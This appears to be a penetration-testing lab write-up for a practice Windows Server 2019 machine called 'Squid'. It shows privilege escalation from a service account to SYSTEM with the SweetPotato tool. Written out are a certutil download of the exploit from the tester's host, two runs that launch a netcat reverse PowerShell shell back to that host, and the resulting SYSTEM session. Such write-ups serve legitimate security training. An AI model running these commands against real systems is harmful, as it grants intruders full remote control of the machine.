SweetPotato
Both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege privileges have been recovered for the service account; nt authority\local service. This makes the target system vulnerable to the potato exploits
I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809 & Windows Server 2019
the target system is Windows Server 2019, so i will be using an alternative; SweetPotato
Exploit
/Practice/Squid/5-Privilege_Escalation/attachments/{13D688EE-E14C-4EBF-BEF2-C50C48897047}.png)
SweetPotato is a collection of various native windows privilege escalation techniques from service accounts to system. it has been created by @ethicalchaos and includes:
- RottenPotato
- Weaponized JuciyPotato with BITS WinRM discovery
- PrintSpoofer discovery and original exploit
- EfsRpc built on EfsPotato
- PetitPotam
Exploitation
PS C:\tmp> cmd /c certutil.exe -urlcache -split -f http://192.168.45.157/SweetPotato.exe C:\\tmp\\SweetPotato.exe
**** Online ****
000000 ...
0e2200
CertUtil: -URLCache command completed successfully.Delivery complete
PS C:\tmp> cmd /c C:\\tmp\\SweetPotato.exe -p "C:\\tmp\\nc64.exe" -e EfsRpc -a "192.168.45.157 1234 -e powershell"
cmd /c C:\\tmp\\SweetPotato.exe -p "C:\\tmp\\nc64.exe" -e EfsRpc -a "192.168.45.157 1234 -e powershell"
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method EfsRpc to launch C:\\tmp\\nc64.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/65af89dd-ed79-404d-a031-51a699c1114b/\65af89dd-ed79-404d-a031-51a699c1114b\65af89dd-ed79-404d-a031-51a699c1114b
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!The command above uses the EFSRPC method, which targets the MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege
PS C:\tmp> cmd /c C:\\tmp\\SweetPotato.exe -p "C:\\tmp\\nc64.exe" -e PrintSpoofer -a "192.168.45.157 1234 -e powershell"
cmd /c C:\\tmp\\SweetPotato.exe -p "C:\\tmp\\nc64.exe" -e PrintSpoofer -a "192.168.45.157 1234 -e powershell"
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method PrintSpoofer to launch C:\\tmp\\nc64.exe
[+] Triggering notification on evil PIPE \\SQUID/pipe/ed3c548c-87b1-4f4d-9bee-7df927ca09bd
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!The embedded PrinterSpoofer works too
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.135.189] 50419
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
SQUID
PS C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.135.189
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254System Level Compromise